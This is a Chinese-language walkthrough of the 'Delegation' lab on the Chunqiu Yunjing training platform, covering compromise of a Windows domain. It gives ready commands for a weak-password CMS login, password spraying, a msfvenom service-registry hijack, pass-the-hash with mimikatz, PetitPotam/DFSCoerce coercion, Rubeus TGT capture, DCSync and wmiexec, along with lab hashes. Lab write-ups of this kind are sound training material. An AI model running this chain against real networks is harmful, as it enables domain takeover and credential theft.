春秋云境-Delegation

发表于 分类于

学习点

172.22.4.36 loaclhost 外网 CmsEasy(易通 CMS)服务器
172.22.4.45 WIN19.xiaorang.lab 配置了非约束委派的主机
172.22.4.19 FILESERVER.xiaorang.lab 文件服务器
172.22.4.7 DC01.xiaorang.lab 域控

cmseasy

弱口令 admin/123456 后台shell,suid提权读文件

diff --line-format=%L /dev/null flag01.txt
/home/flag/ >diff --line-format=%L /dev/null flag01.txt
  ____  U _____ u  _     U _____ u   ____      _       _____             U  ___ u  _   _     
 |  _"\ \| ___"|/ |"|    \| ___"|/U /"___|uU  /"\  u  |_ " _|     ___     \/"_ \/ | \ |"|    
/| | | | |  _|" U | | u   |  _|"  \| |  _ / \/ _ \/     | |      |_"_|    | | | |<|  \| |>   
U| |_| |\| |___  \| |/__  | |___   | |_| |  / ___ \    /| |\      | | .-,_| |_| |U| |\  |u   
 |____/ u|_____|  |_____| |_____|   \____| /_/   \_\  u |_|U    U/| |\u\_)-\___/  |_| \_|    
  |||_   <<   >>  //  \\  <<   >>   _)(|_   \\    >>  _// \\_.-,_|___|_,-.  \\    ||   \\,-. 
 (__)_) (__) (__)(_")("_)(__) (__) (__)__) (__)  (__)(__) (__)\_)-' '-(_/  (__)   (_")  (_/  

flag01: flag{cfb91c90-a38a-4419-a974-ad32415fccd3}

Great job!!!!!!

Here is the hint: WIN19\Adrian

I'll do whatever I can to rock you...

fscan

172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.7:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.7:88 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.36:3306 open
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7	(Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.4.36        code:200 len:0      title:None
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

用户密码爆破

proxychains4 -q crackmapexec smb 172.22.4.45 -u Adrian -p pass.txt --local-auth

image-20250501182846491

密码 babygirl1 但是已经过期,远程更改密码

使用impacket失败

$ proxychains4 -q impacket-changepasswd WIN19/Adrian:'babygirl1'@172.22.4.45 -newpass 'Admin@123456'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of WIN19\Adrian
[*] Connecting to DCE/RPC as WIN19\Adrian
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1091, in login
    if packet.isValidAnswer(STATUS_SUCCESS):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PASSWORD_EXPIRED(The user account password has expired.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 392, in connect
    self.dce = self.authenticate(anonymous=False)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 371, in authenticate
    dce.connect()
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 805, in connect
    return self._transport.connect()
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 514, in connect
    self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 282, in login
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000071 - STATUS_PASSWORD_EXPIRED - The user account password has expired.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1091, in login
    if packet.isValidAnswer(STATUS_SUCCESS):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 960, in <module>
    handler.changePassword(
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 225, in changePassword
    return self._changePassword(
           ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 530, in _changePassword
    if not self.connect(retry_if_expired=True):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 398, in connect
    self.dce = self.authenticate(anonymous=True)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/share/doc/python3-impacket/examples/changepasswd.py", line 371, in authenticate
    dce.connect()
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 805, in connect
    return self._transport.connect()
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 514, in connect
    self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 282, in login
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

使用rdp修改密码为 Admin@123

rdesktop 172.22.4.45 -d WIN19 -u Adrian -p babygirl1 -z

注册表提权

利用提权检查脚本发现存在对 SYSTEM用户的 gupdate 服务的注册表路径有修改权限

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML"

image-20250501185044977

Name              : gupdate
ImagePath         : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetV
                    alue, QueryValue
Status            : Stopped
UserCanStart      : True
UserCanStop       : True

Name              : gupdate
ImagePath         : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : BUILTIN\Users
Permissions       : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetV
                    alue, QueryValue
Status            : Stopped
UserCanStart      : True
UserCanStop       : True

Name              : Spooler
ImagePath         : C:\Windows\System32\spoolsv.exe
User              : LocalSystem
ModifiablePath    : HKLM\SYSTEM\CurrentControlSet\Services\Spooler
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : ReadControl, EnumerateSubKeys, WriteOwner, CreateSubKey, QueryValue
Status            : Running
UserCanStart      : False
UserCanStop       : False

msf生成exe,去执行a.bat

msfvenom -p windows/x64/exec cmd='C:\windows\system32\cmd.exe /c C:\Users\Public\Downloads\a.bat ' --platform windows -f exe-service > a.exe

a.bat

net localgroup administrators Adrian /add

修改服务程序路径

# 修改服务程序
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\Downloads\a.exe" /f
# 查询
reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath
# 启动
sc start gupdate

image-20250501192154286

flag02

image-20250501192609130

信息收集

提权后reg拿到机器密码hash,pth去做域内信息收集

WIN19$:aad3b435b51404eeaad3b435b51404ee:c38ca39606871db61c1389b0fbedf381

用机器hash做PTH

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN19$ /domain:xiaorang.lab /ntlm:c38ca39606871db61c1389b0fbedf381" exit

image-20250501195922825

委派信息查询

在Win19本地使用adfind,直接查到当前机器配置了非约束委派

C:\Users\Public\Downloads>AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

AdFind V01.62.00cpp Joe Richards ([email protected]) October 2023

Using server: DC01.xiaorang.lab:389
Directory: Windows Server 2016

dn:CN=DC01,OU=Domain Controllers,DC=xiaorang,DC=lab
dn:CN=WIN19,CN=Computers,DC=xiaorang,DC=lab

2 Objects returned

image-20250501200244951

远程可以用impacket

impacket-findDelegation xiaorang.lab/'WIN19$' -hashes :c38ca39606871db61c1389b0fbedf381 -dc-ip 172.22.4.7

image-20250501200515429

远程还可以用adinfo

Adinfo_win.exe -d xiaorang.lab --dc 172.22.4.7 -u WIN19$ -H c38ca39606871db61c1389b0fbedf381 --checkbackdoor

image-20250501201351595

在win上能正常走代理,在linux下貌似有bug,拒绝访问

image-20250501201504490

所以下面只需要强制触发域控认证即可!

非约束委派+NTLM 强制认证

使用 Printerbug、PetitPotam 、dfscoerce等强制域控进行认证

PetitPotam 在2008、2012低版本环境下可匿名触发:匿名访问的命名管道中有三个netlogon、samr、lsarpc

impacket-PetitPotam WIN7.test.com 192.168.100.128

proxychains4 -q impacket-PetitPotam -u 'WIN19$' -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7

proxychains4 -q impacket-dfscoerce -u 'WIN19$' -hashes :c38ca39.. -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab 172.22.4.7

image-20250501202614834

image-20250501202929756

Rubeus开启监听并获取域控机器用户的TGT票据

Rubeus-net47.exe monitor /interval:3 /targetuser:DC01$ /nowrap

image-20250501204022976

攻击域控

kali导入票据进行dcsync

# 转换票据
echo 'doIFlDCCBZCg..' | base64 -d > DC.kirbi
impacket-ticketConverter DC.kirbi DC.ccache

# 导入票据
export KRB5CCNAME=DC.ccache

# 查看票据
klist

# secretsdump
正确:impacket-secretsdump -k -no-pass 'DC-1$'@DC-1.test.com -dc-ip 192.168.100.128
错误:impacket-secretsdump xiaorang.lab/[email protected] -just-dc-ntlm -k -no-pass

可以看到导入的票据为krbtgt的TGT票据

image-20250508015256007

image-20250508015315649

也可以用 Rubeus + mimikatz

Rubeus.exe ptt /ticket:doIFlDC...
klist
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image-20250501220838432

PTH打域控和另一台

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell